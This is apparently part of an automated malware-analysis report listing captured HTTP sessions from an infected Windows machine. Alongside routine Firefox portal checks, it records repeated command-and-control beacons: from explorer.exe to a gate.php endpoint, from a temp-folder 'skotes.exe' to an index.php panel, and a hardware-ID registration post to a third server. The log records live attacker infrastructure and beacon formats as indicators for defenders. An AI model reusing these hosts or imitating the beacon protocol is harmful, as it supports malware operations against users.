Dec 12, 2024 16:50:53.707391977 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75295 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:51:03.782874107 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 12, 2024 16:51:05.174751997 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:51:05.489336967 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75307 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 12, 2024 16:51:10.307329893 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 12, 2024 16:51:10.621658087 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Wed, 11 Dec 2024 18:55:58 GMT Age: 75312 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
115	192.168.2.10	50219	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:24.666887999 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.10	50221	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:24.758658886 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:24.882642031 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:26.257503033 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:25 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.10	50227	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:25.516558886 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.10	50231	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:26.423924923 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.10	50233	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:26.505068064 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:26.627265930 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:27.945735931 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:27 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.10	50232	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:26.536042929 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:50:27.819387913 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.10	50236	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:26.840504885 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.10	50237	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:27.390544891 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.10	50242	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:28.170372009 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:50:29.261311054 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42085 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:50:29.329361916 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:50:29.648333073 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42085 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:50:32.730245113 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:50:33.047941923 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42088 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:50:43.204361916 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 12, 2024 16:50:44.163570881 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:50:44.483501911 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42100 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:50:52.183986902 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:50:52.509226084 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42108 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:50:53.745369911 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:50:54.063251972 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42109 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:51:04.143476009 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 12, 2024 16:51:05.633491993 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:51:05.949968100 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42121 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success
Dec 12, 2024 16:51:10.627526045 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 12, 2024 16:51:10.943296909 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Thu, 12 Dec 2024 04:09:04 GMT Age: 42126 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.10	50243	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:28.200229883 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:28.320557117 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:29.930138111 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.10	50253	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:30.054193974 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:31.384952068 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.10	50254	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:30.171413898 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:30.297075987 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:31.769669056 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.10	50255	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:30.416608095 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:50:31.745748997 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:50:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 12, 2024 16:50:31.829932928 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIJJDGCBKFIDHIEBKE Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 42 33 41 36 39 44 41 41 36 45 32 33 37 31 35 34 33 35 31 30 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 45 2d 2d 0d 0a Data Ascii: ------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="hwid"2DB3A69DAA6E2371543510------HDGIJJDGCBKFIDHIEBKEContent-Disposition: form-data; name="build"stok------HDGIJJDGCBKFIDHIEBKE--
Dec 12, 2024 16:50:32.280467033 CET	210	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:50:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.10	50258	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:32.045134068 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:32.183845043 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:33.682008028 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.10	50260	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:33.113879919 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
Dec 12, 2024 16:50:34.452907085 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.10	50261	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:33.937956095 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:34.064095974 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:35.507217884 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:34 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.10	50265	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:35.754877090 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:35.876600027 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:37.387463093 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.10	50266	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:36.619726896 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 12, 2024 16:50:37.956245899 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:50:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.10	50268	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:37.629914045 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:37.750818968 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:39.326740980 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.10	50272	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:39.583461046 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:50:39.704101086 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:50:41.219197035 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:50:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.10	50273	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:50:39.676470995 CET	306	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 152 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 45 37 37 42 30 35 42 38 32 44 31 32 46 43 30 37 44 42 32 33 39 42 39 36 44 41 30 34 34 35 31 36 36 45 46 37 41 37 44 33 35 42 31 45 37 35 30 38 36 34 32 39 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B12E77B05B82D12FC07DB239B96DA0445166EF7A7D35B1E750864299
